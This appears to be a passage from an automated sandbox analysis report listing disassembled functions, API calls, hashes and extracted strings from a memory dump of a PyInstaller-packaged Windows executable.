                                                              • Instruction ID: 8bf933efa4c881e2c582e666c66debd1c2c3adc15e8ab14a92f0b318f1fd356b
                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction Fuzzy Hash: 4751B836B2865585EB288B2AE84523C37A1EB44F98F244171CE4DA77A5CF3AFD43C741
                                                              Function 00007FF623F81B50 Relevance: .1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction ID: 0c861946e64b4ec27c0bf614f69990561276ac88ca13a785de2f973f4d8e9176
                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction Fuzzy Hash: 4351C776A1865181EF288F2AE44237837A0EB45F98F244271CE4CA7794DF3AEE43C741
                                                              Function 00007FF623F85D30 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction ID: 537bfe83cdfda6bb4d5b0612575e90aea2734467206c0a105bc90e394a1413c5
                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction Fuzzy Hash: 9C4195A380D74A47EEAD891A1D096B42A829F127E4E5852F4DD9DB73D3CF0D6B87C103
                                                              Function 00007FF623F89EA0 Relevance: .1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                              • Instruction ID: 492ae419562e3c4240cec27a63e52c1452347351165d59367e934837472c34a7
                                                              • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                              • Instruction Fuzzy Hash: 3641E422714A5582EF08CF2AED2556973A1FB48FD0B499036EE4DE7B64DF3DD1468301
                                                              Function 00007FF623F880E4 Relevance: .1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                              • Instruction ID: 39fa7273ad741b1382863d289dcc38a44dc70785f7f23e8a515572edf21ec7ed
                                                              • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                              • Instruction Fuzzy Hash: 5831C532709F4241EB689F26BC4213D7AD5AB84BE0F144278EA5DA3BD6DF3CD2028705
                                                              Function 00007FF623F99570 Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                              • Instruction ID: 4b524becb5d72ef16d45fb6c0470c1ac0fe85fa22be41d147b65d2f37d3518c5
                                                              • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                              • Instruction Fuzzy Hash: 25F044B17182958ADB988F69B80362A77D1F708380F88907AD58DC7E04DF3CD1518F15
                                                              Function 00007FF623F7D30C Relevance: .0, Instructions: 2COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                              • Instruction ID: b87ea656e5169d7dc31b0177b7b72c2110e5832de76fca0e783e5115c658062c
                                                              • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                              • Instruction Fuzzy Hash: B6A00122D0C80AD0EA858F00BC920252220FB54700B8040B2E00DBA0A49F2CAA049242
                                                              Function 00007FF623F75830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75840
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75852
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75889
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7589B
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758B4
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758C6
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758DF
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F758F1
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7590D
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7591F
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7593B
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7594D
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75969
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F7597B
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F75997
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F759A9
                                                              • GetProcAddress.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F759C5
                                                              • GetLastError.KERNEL32(?,00007FF623F764CF,?,00007FF623F7336E), ref: 00007FF623F759D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 199729137-653951865
                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                              • Instruction ID: 7d5c66c4d9a5669389682544d1bdcbb71416c5f2ce0bd87c29870c31cb4b213f
                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                              • Instruction Fuzzy Hash: 6322A364A0DB0BD2FE159F55BD175B422A1AF48B81F8590B5C41EAB270EF3CBB59C203
                                                              Function 00007FF623F781D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F79390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF623F745F4,00000000,00007FF623F71985), ref: 00007FF623F793C9
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF623F786B7,?,?,00000000,00007FF623F73CBB), ref: 00007FF623F7822C
                                                                • Part of subcall function 00007FF623F72810: MessageBoxW.USER32 ref: 00007FF623F728EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                              • Instruction ID: 210f545aca279fdbe736a32dcc277a68150ebe780f5dce6e01e88ae3445402a8
                                                              • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                              • Instruction Fuzzy Hash: BE519411A2CA8251FE509F25FD532BA6250EF94784F5444B6EA0EEB6D5EF2CE704C342
                                                              Function 00007FF623F72180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction ID: 89f2da045359394ccb0e94c433d1ba73240892a0e581e39fe40e0eabf9260645
                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction Fuzzy Hash: E451E826618BA186DA349F26F8181BAB7A1F798B61F004135EFDE83794DF3CD145DB10
                                                              Function 00007FF623F780C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                              • String ID: Needs to remove its temporary files.
                                                              • API String ID: 3975851968-2863640275
                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                              • Instruction ID: 4e24e54cd96b882655b6824943e17ecdc95c4ab6a90a0b710c498de3b344169f
                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                              • Instruction Fuzzy Hash: 90218621B08A42C2EF458F7ABC561796251FF88F90F5882B1DA1DD73E5DF6CDA918302
                                                              Function 00007FF623F86290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction ID: 9d238fda8c9f3308c1e4cb0490d0686a42046e8540558dd632584e7c79064343
                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction Fuzzy Hash: CC12B361E0C28386FF285E16F95667DB691FB407D0F8445B5E78AA76C4DF3CE6808B02
                                                              Function 00007FF623F80FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction ID: e22e597ea99da124b5edc7471c5535819b2979fced62c430dfb04875c7b1c957
                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction Fuzzy Hash: FB12B662E0C14386FF285E16F8466B976A1FB407D0F844275D69AD7AC4DF3CE682CB02
                                                              Function 00007FF623F71050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: 085cb76daa7947960dd34b56a6c5c4d4239805f679dc7990efc8d9dee6403e43
                                                              • Instruction ID: 391ef77bf284fe9c0045cf11af3f084ef6b18b4641ede8c1e1378da13a1a22d9
                                                              • Opcode Fuzzy Hash: 085cb76daa7947960dd34b56a6c5c4d4239805f679dc7990efc8d9dee6403e43
                                                              • Instruction Fuzzy Hash: C1418E21B1865282EE14DB12BC066BA6394FF44BC4F5445B2ED0CAB79ADF3CE606C742
                                                              Function 00007FF623F71470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: 632a956a3d9bae5ce80dbf10058bfd23fff8cddaa322db06dd456a1e5c2a273e
                                                              • Instruction ID: 79c5551ca90c4f942667e1560eb04dd0b37b32a32949bfc6bbed712a34e9c202
                                                              • Opcode Fuzzy Hash: 632a956a3d9bae5ce80dbf10058bfd23fff8cddaa322db06dd456a1e5c2a273e
                                                              • Instruction Fuzzy Hash: D6416E22B1864296EF14DF22BC425B96390EF447D4F4445B2ED4DABB99DF3CEA06C702
                                                              Function 00007FF623F7EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                              • Instruction ID: eb643c0bc37bd795acbf4c05468a3c9163a91fc2428d84ae792535af211ed9a2
                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                              • Instruction Fuzzy Hash: 5BD1703290874186EF209F65E8463AD77A0FB55B88F100176EE4DAF795EF38E694C702
                                                              Function 00007FF623F72C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72C9E
                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72D63
                                                              • MessageBoxW.USER32 ref: 00007FF623F72D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message$CurrentFormatProcess
                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                              • API String ID: 3940978338-251083826
                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                              • Instruction ID: 40fc789257baf624bb4a1023497335e57fb0f40c4a91039dce3374f32279c5dc
                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                              • Instruction Fuzzy Hash: 3E31E822708B4152EB20AB25BC156AA6791BF88BD8F414136EF4DE7759EF3CD706C301
                                                              Function 00007FF623F7DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DD4D
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DD5B
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DD85
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DDF3
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DDFF
                                                              Strings
                                                              Memory Dump Source
